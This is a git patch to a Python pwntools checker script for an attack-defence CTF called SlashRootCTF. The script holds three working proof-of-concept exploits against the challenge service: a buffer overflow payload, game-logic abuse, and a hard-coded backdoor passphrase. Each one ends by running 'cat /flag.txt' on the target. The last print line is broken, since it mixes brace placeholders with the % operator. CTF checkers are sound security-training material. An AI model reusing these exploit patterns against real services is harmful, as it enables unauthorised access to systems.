From dc44c91c792241f18b79e5a59229e8c63074ebda Mon Sep 17 00:00:00 2001 From: myitinos Date: Fri, 11 Oct 2019 22:18:51 +0800 Subject: [PATCH] update --- checker.py | 132 ++++++++++++++++++++++++++--------------------------- 1 file changed, 64 insertions(+), 68 deletions(-) diff --git a/checker.py b/checker.py index 2ffd3f3..6b1dc47 100644 --- a/checker.py +++ b/checker.py @@ -6,99 +6,95 @@ TOTAL_TEAMS = 1 FORMAT = "SlashRootCTF" -def run(): - # return process(FILENAME) - return remote("127.0.0.1", 60204) +def poc0(host, port): + with remote(host, port) as p: + p.recvuntil(">") + p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) + msg = p.recvuntil(">") + # print(msg) + if "young" in msg: + p.sendline("y") + p.recvuntil(">") + p.sendline("2") + p.recvuntil(">") + p.sendline("4") + p.recvuntil(">") + p.sendline("y") + for _ in xrange(10): + p.recvuntil(">") + p.sendline("99") + p.sendline("cat /flag.txt") + flag = p.recvuntil("}") + # print flag + if FORMAT in flag: + return True + else: + return False + else: + return False -def poc0(host, port): - p = remote(host, port) - p.recvuntil(">") - p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) - msg = p.recvuntil(">") - # print(msg) - if "young" in msg: - p.sendline("y") +def poc1(host, port): + with remote(host, port) as p: p.recvuntil(">") - p.sendline("2") + p.sendline("Leo") + p.recvuntil(">") + p.sendline("y") + for _ in range(2): + p.recvuntil(">") + p.sendline("3") + p.recvuntil(">") + p.sendline("0") + if "Who" in p.recvuntil(">"): + return False + p.sendline("y") + p.recvuntil(">") + p.sendline("1") p.recvuntil(">") p.sendline("4") p.recvuntil(">") p.sendline("y") - for _ in xrange(10): + for _ in range(10): p.recvuntil(">") p.sendline("99") p.sendline("cat /flag.txt") flag = p.recvuntil("}") - # print flag if FORMAT in flag: return True else: return False - else: - return False - - -def poc1(host, port): - p = remote(host, port) - p.recvuntil(">") - p.sendline("Leo") - p.recvuntil(">") - p.sendline("y") - for _ in range(2): - p.recvuntil(">") - p.sendline("3") - p.recvuntil(">") - p.sendline("0") - if "Who" in p.recvuntil(">"): - return False - p.sendline("y") - p.recvuntil(">") - p.sendline("1") - p.recvuntil(">") - p.sendline("4") - p.recvuntil(">") - p.sendline("y") - for _ in range(10): - p.recvuntil(">") - p.sendline("99") - p.sendline("cat /flag.txt") - flag = p.recvuntil("}") - if FORMAT in flag: - return True - else: - return False def poc2(host, port): - p = remote(host, port) - p.recvuntil(">") - p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__") - p.recvuntil(">") - p.sendline("y") - p.recvuntil(">") - p.sendline("6") - if "Lv: 1000000" in p.recvuntil(">"): - p.sendline("2") + with remote(host, port) as p: p.recvuntil(">") - p.sendline("4") + p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__") p.recvuntil(">") p.sendline("y") - for _ in xrange(10): + p.recvuntil(">") + p.sendline("6") + if "Lv: 1000000" in p.recvuntil(">"): + p.sendline("2") p.recvuntil(">") - p.sendline("99") - p.sendline("cat /flag.txt") - flag = p.recvuntil("}") - if FORMAT in flag: - return True + p.sendline("4") + p.recvuntil(">") + p.sendline("y") + for _ in xrange(10): + p.recvuntil(">") + p.sendline("99") + p.sendline("cat /flag.txt") + flag = p.recvuntil("}") + if FORMAT in flag: + return True + else: + return False else: return False - else: - return False if __name__ == "__main__": for i in range(1, TOTAL_TEAMS+1): - print poc0(HOST, (60004 + (i*100))) - print poc1(HOST, (60004 + (i*100))) - print poc2(HOST, (60004 + (i*100))) + r0 = poc0(HOST, (60004 + (i*100))) + r1 = poc1(HOST, (60004 + (i*100))) + r2 = poc2(HOST, (60004 + (i*100))) + print("Team [{}] {} {} {}" % (i, r0, r1, r2))